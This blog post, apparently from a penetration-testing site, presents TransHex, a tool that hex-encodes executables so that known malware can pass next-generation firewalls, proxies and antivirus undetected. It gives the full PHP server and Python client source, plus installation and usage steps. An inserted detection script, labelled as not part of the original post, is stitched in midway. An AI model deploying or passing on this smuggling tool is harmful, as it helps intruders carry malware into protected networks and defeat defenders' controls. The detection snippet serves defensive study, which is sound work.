Summary

We have all faced the problem of transferring “malicious” or binary files through corporate firewalls or proxies when doing penetration tests. Previously the workaround was quite easy: FTP, SSL, and SSH tunneling (the list goes on) provided a quick and easy way to bring whatever tools a penetration tester needed into the environment. Edge technologies have now matured, and these simple techniques no longer work, mainly because of next-generation firewalls with application ID. So how do you get around this? Go old school to beat new school tech!

The general idea we had before writing the very rough first release of TransHex was that AV does not scan hex in text files. So how do you beat the application ID portion of the next-gen firewalls? Easy, you don’t. We initially wrote the program completely in Python as a client-server app and were quickly blocked by next-gen firewalls. So if you can’t beat them, join them. The app was ported to a web server and bingo bango, we were transferring files through multiple next-gen firewalls without being detected.

So here is a quick breakdown on how TransHex works.

  • The attacker/pentester goes to the web app, which would be loaded on a public server
  • The attacker/pentester requests an exe that is available on a different publicly available server and submits its URL to the application
  • TransHex at this point downloads the exe and saves it to [web path]/hex/[filename]
  • Once the download is complete, a Python script is run that converts the binary file to a single hex string
  • The hex string is written to a new text file in [web path]/hex/[filename].txt (same base name, .txt extension)
  • The attacker/pentester then goes back to the main page of the application by clicking continue
  • The new text file is now listed on the first page
  • The attacker/pentester then saves the text file to the local machine using the internet browser
  • On the local machine the attacker/pentester converts the text file with the hex string back to a binary using the Python client script

Application Notes

This application is provided as is.  NO support is offered for this application and essentialexploit.com is NOT liable for any damage this application may cause.  Essentialexploit.com is also NOT liable for any misuse of this application or the use of this application for illegal purposes.

Features that need to be added

  • Error handling
  • Help/man pages
  • Request hex conversion of local (server side) executables
  • Hex string obfuscation

Limitations and Testing

  • Max file size tested: 115KB
  • File types tested: zip and exe, Windows files and known malware
  • Tested through multiple next-gen firewalls and proxies
  • Must have Python loaded on the client machine, or transfer the client as an exe to the client by other means
  • Tested on Kali Linux (3.7-trunk-686-pae #1 AMP Debian 3.7.0.2-0+kali5 i686 GNU/Linux)
  • The server application is NOT meant to be secure! You must wrap your own security around the application

Installation (on Fresh install of Kali Linux)

SERVER SIDE

  1. Download the TransHex package from here (MD5:A38EB881A4708FD474D858680648E611 SHA1:10E0066CEF1B95CF77498347D21DFCBB15CA7D5F)
  2. Extract the files from the package
  3. Delete /var/www/index.html
  4. Copy contents of the Server folder from the package to /var/www/
  5. Ensure permissions are correct on the files (again this is NOT a secure app)
    1. chmod 755 TransHex_BIN_to_TXT.py
    2. chmod 644 index.php
    3. chmod 644 getfile.php
    4. chmod 777 hex
  6. Run – service apache2 start
  7. Go to http://127.0.0.1 and the page should now be live

CLIENT SIDE

  1. Somehow get the file TransHex_TXT_to_BIN.py to a client on the inside of the network (needs python installed)
  2. OR convert the file TransHex_TXT_to_BIN.py to a PE and get it to a client on the inside of the network

Usage

  1. Locate the URL of the exe that you wish to download (also works with archive files)
  2. From the client on the inside of the network, open a browser and go to your server (hopefully the URL isn’t blocked)
  3. Enter the URL of the exe into the text field and click “Go Get It!”
  4. Wait for the page to load. There is no progress bar, and with large files or slow connections PHP settings may have to be changed on the server
  5. Once the page loads click “continue …”
  6. You will now see your text file in the list
  7. Right click the hyperlink of the text file and select “Save Link As…”
  8. Save the text file to the same location as the TransHex_TXT_to_BIN.py file
  9. Open a command shell on the client
  10. Navigate to the path where TransHex_TXT_to_BIN.py is located
  11. Run – python TransHex_TXT_to_BIN.py [text file name] [new binary file name]

Conclusion

Based on a very simple idea, TransHex is able to defeat very sophisticated technology. It is obviously limited by the need to get the client onto the internal network and to be able to execute it there.

This trick has worked since I started using it about 5 or 6 years ago and continues to work today. Edge technology may never be able to pick up on this, as signatures would have to be made for ASCII text and compared to binary signatures, or some other means would have to be created. So have fun with it and, as always, don’t be stupid and break the law.
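The conclusion says an edge device would have to decode the ASCII hex and compare it against binary signatures. The following added example (not part of TransHex or the original post) does exactly that on the defender's side: it finds long hex runs in text, decodes them, and checks the result against PE and ZIP magic bytes, covering both the bare hex file the workflow above produces and hex buried inside other text. The sample inputs are constructed fake headers, not real files.

```python
import binascii
import re

# TransHex writes binascii.hexlify output: one unbroken run of hex digits and nothing else.
# Requiring at least 128 digits (64 bytes) skips hashes, GUIDs and similar short tokens.
HEX_RUN = re.compile(r'[0-9A-Fa-f]{128,}')

# Magic bytes of the two file types the post says were tested: PE executables and ZIP archives.
# The DOS stub text sits in the first few hundred bytes of almost every linker-built PE and
# backs up the weak two-byte "MZ" magic.
MAGICS = {'zip': (b'PK\x03\x04', b'PK\x05\x06', b'PK\x07\x08'), 'pe': (b'MZ',)}
DOS_STUB = b'This program cannot be run in DOS mode'

def hex_runs_to_bytes(text):
    """Yield (char_offset, decoded_bytes) for each long hex run; odd-length runs lose the last nibble."""
    for m in HEX_RUN.finditer(text):
        run = m.group(0)
        if len(run) % 2:
            run = run[:-1]
        yield m.start(), binascii.unhexlify(run)

def classify_blob(blob):
    """Return 'pe', 'zip' or None for decoded bytes, based on the magic value at offset 0."""
    if blob.startswith(MAGICS['pe']) and DOS_STUB in blob[:1024]:
        return 'pe'
    if blob.startswith(MAGICS['zip']):
        return 'zip'
    return None

def scan_text(text):
    """Return [(char_offset, type, decoded_size)] for every hex run that decodes to a known binary type."""
    findings = []
    for offset, blob in hex_runs_to_bytes(text):
        kind = classify_blob(blob)
        if kind:
            findings.append((offset, kind, len(blob)))
    return findings

# Constructed sample inputs, not real files: a fake PE header, a fake ZIP local-file header,
# and a SHA-256-sized hex token that a detector must not flag.
FAKE_PE = b'MZ\x90\x00' + b'\x00' * 60 + DOS_STUB + b'\x00' * 100
FAKE_ZIP = b'PK\x03\x04\x14\x00' + b'\x00' * 80
SAMPLE_PE_TXT = binascii.hexlify(FAKE_PE).decode('ascii')                        # what TransHex_BIN_to_TXT.py writes
SAMPLE_ZIP_TXT = 'report: ' + binascii.hexlify(FAKE_ZIP).decode('ascii') + '\n'  # hex buried in other text
SAMPLE_BENIGN = 'sha256=' + 'ab' * 32 + '\n'

if __name__ == '__main__':
    for name, text in [('pe', SAMPLE_PE_TXT), ('zip', SAMPLE_ZIP_TXT), ('benign', SAMPLE_BENIGN)]:
        print(name, scan_text(text))
```

Running the same check over proxy-logged response bodies or over files landing in a download directory is what turns this from a demo into a detection; the "MZ" plus DOS-stub requirement trades a few missed stub-less PEs for far fewer false positives on random hex.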

Images

Installation Permissions (image: www_perm)

Main Server Page (image: server)

Usage Images (images: usage_01 to usage_05)

Files

***Download the TransHex package (MD5:A38EB881A4708FD474D858680648E611 SHA1:10E0066CEF1B95CF77498347D21DFCBB15CA7D5F), as the plugin that is used to show code usually screws up the source and it may not work***

index.php

<html>
<head><title>TransHex by EssentialExploit.com</title></head>
<body>

<h1>TransHex Web Server</h1>
<h3>Download New File To Hex</h3>
<form action="getfile.php">
Enter URL of the Binary: <input type="text" name="urlinput" value="http://">&nbsp;&nbsp;<input type="submit" value="Go Get It!">
</form>

<h3>Browse and Download Hex Files</h3>
<?php
// Build the list of converted .txt files in hex/. Start from an empty string so the
// .= below does not append to an undefined variable.
$thelist = '';
if ($handle = opendir('hex/')) {
    while (false !== ($file = readdir($handle)))
    {
        if ($file != "." && $file != ".." && strtolower(substr($file, strrpos($file, '.') + 1)) == 'txt')
        {
            // Escape the file name before putting it into the page markup
            $safe = htmlspecialchars($file);
            $thelist .= '<li><a href="hex/'.$safe.'">'.$safe.'</a></li>';
        }
    }
    closedir($handle);
}
?>
<ul>
<?=$thelist?>
</ul>

<form action="/"><input type="submit" value="Refresh Page"></form>

</body>
</html>

getfile.php

<html>
<head><title>TransHex by EssentialExploit.com</title></head>
<body>

<h1>TransHex Web Server</h1>
<h3>Progress</h3>
<?php

$url = $_GET["urlinput"];

// Use the last path component of the URL as the local file name. basename() strips
// any directory parts, so the download always lands inside hex/.
$parts = explode("/", $url);
$filename = basename(end($parts));
$filenameandpath = "hex/" . $filename;
$TXTFILE = explode(".", $filename);
$TXTFILE = $TXTFILE[0] . ".txt";
$TXTFILEandpath = "hex/" . $TXTFILE;

// Remove stale copies left from an earlier run with the same file name
if (file_exists($filenameandpath)) { unlink($filenameandpath); }
if (file_exists($TXTFILEandpath)) { unlink($TXTFILEandpath); }

echo "The file " . htmlspecialchars($url) . " is being downloaded. <br>";
file_put_contents($filenameandpath, file_get_contents($url));
echo "The file " . htmlspecialchars($filename) . " has been downloaded. <br>Starting to convert to hex.<br>";

// Quote both paths so a crafted file name cannot add extra shell commands
$execString = "python TransHex_BIN_to_TXT.py " . escapeshellarg($filenameandpath) . " " . escapeshellarg($TXTFILEandpath);
$output = shell_exec($execString);
print "All Done ... I hope.";

?>

<form action="/"><input type="submit" value="Continue ..."></form>

</body>
</html>

TransHex_BIN_to_TXT.py

'''
TransHex_BIN_to_TXT.py
Created on June 19, 2013
@author: Essential Exploit Labs
'''
import sys, binascii

if len(sys.argv) != 3:
    sys.exit('usage: python TransHex_BIN_to_TXT.py [binary file] [text file]')

BINFILE = sys.argv[1]
TXTFILE = sys.argv[2]

# Function to convert a binary file to a text file with a hex string
def bin_to_txt():
    print(BINFILE)
    with open(BINFILE, "rb") as infile:
        content = infile.read()

    # Opening with 'w' truncates any existing file, so no separate delete is needed.
    # hexlify() returns bytes; decode them so the result can be written as text.
    with open(TXTFILE, 'w') as outputfile:
        outputfile.write(binascii.hexlify(content).decode('ascii'))

# Start the main program
bin_to_txt()

TransHex_TXT_to_BIN.py

'''
TransHex_Client.py
Created on June 19, 2013
@author: Essential Exploit Labs
'''
import sys, binascii

if len(sys.argv) != 3:
    sys.exit('usage: python TransHex_TXT_to_BIN.py [text file] [new binary file]')

TXTFILE = sys.argv[1]
BINFILE = sys.argv[2]

# Function to convert a text file with a hex string to a binary file
def txt_to_bin(filename):
    with open(TXTFILE, "r") as inputfile:
        # strip() drops any newline the browser or an editor may have appended,
        # which would otherwise make unhexlify() fail
        content = inputfile.read().strip()

    # Opening with 'wb' truncates any existing file, so no separate delete is needed
    with open(filename, 'wb') as outputfile:
        outputfile.write(binascii.unhexlify(content))

    print('Binary file has been created')

# Start the main program
txt_to_bin(BINFILE)
